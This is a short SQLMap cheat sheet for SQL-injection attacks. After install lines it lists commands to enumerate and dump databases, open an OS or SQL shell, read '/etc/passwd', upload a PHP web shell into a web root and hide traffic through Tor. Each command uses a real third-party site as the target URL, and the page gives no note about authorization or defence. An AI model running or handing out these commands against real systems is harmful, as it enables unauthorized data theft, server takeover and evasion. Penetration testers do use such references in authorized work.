
SQLMap

Installation

macOS

$ brew install sqlmap

Linux

$ sudo apt install sqlmap

Go-to Commands

$ sqlmap -u "https://google.com/?q=1" --dbs --no-cast --random-agent

Get data

All databases

$ sqlmap -u "https://google.com/?q=1" --dbs

All tables in db

$ sqlmap -u "https://google.com/?q=1" --tables -D "DB-NAME"

All columns in table

$ sqlmap -u "https://google.com/?q=1" -D "DB-NAME" -T "TABLE-NAME" --columns

Dumped contents

$ sqlmap -u "https://google.com/?q=1" -D "DB-NAME" -T "TABLE-NAME" --dump

Get Shell

Get OS Shell

$ sqlmap -u "https://google.com/?q=1" --os-shell

Get SQL Shell

$ sqlmap -u "https://google.com/?q=1" --sql-shell

File

Read File

$ sqlmap -u "https://google.com/?q=1" --file-read '/etc/passwd'

Write File

$ sqlmap -u "https://google.com/?q=1" --file-write './shell.php' --file-dest '/apache/public/shell.php'

With Tor

$ sqlmap -u "https://google.com/?q=1" --tor --tor-type=SOCKS5

Licensed under CC BY-NC-SA 4.0